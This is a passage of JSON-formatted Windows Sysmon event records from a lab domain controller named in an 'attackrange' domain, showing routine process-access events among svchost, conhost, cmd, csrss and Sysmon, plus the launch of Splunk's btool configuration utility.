{A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1751,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1752,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1753,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1754,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010E18B0300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010E18B0300}","TargetProcessId":"4028","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1755,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.119\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-0010C88D0300}\r\nProcessId: 4052\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-0010E18B0300}\r\nParentProcessId: 4028\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.119","ProcessGuid":"{A837DB8D-01C7-5F25-0000-0010C88D0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-0010E18B0300}","ParentProcessId":"4028","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1756,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-0010E18B0300}\r\nSourceProcessId: 4028\r\nSourceThreadId: 4032\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010C88D0300}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-0010E18B0300}","SourceProcessId":"4028","SourceThreadId":"4032","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010C88D0300}","TargetProcessId":"4052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1757,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010C88D0300}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010C88D0300}","TargetProcessId":"4052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1758,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1759,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 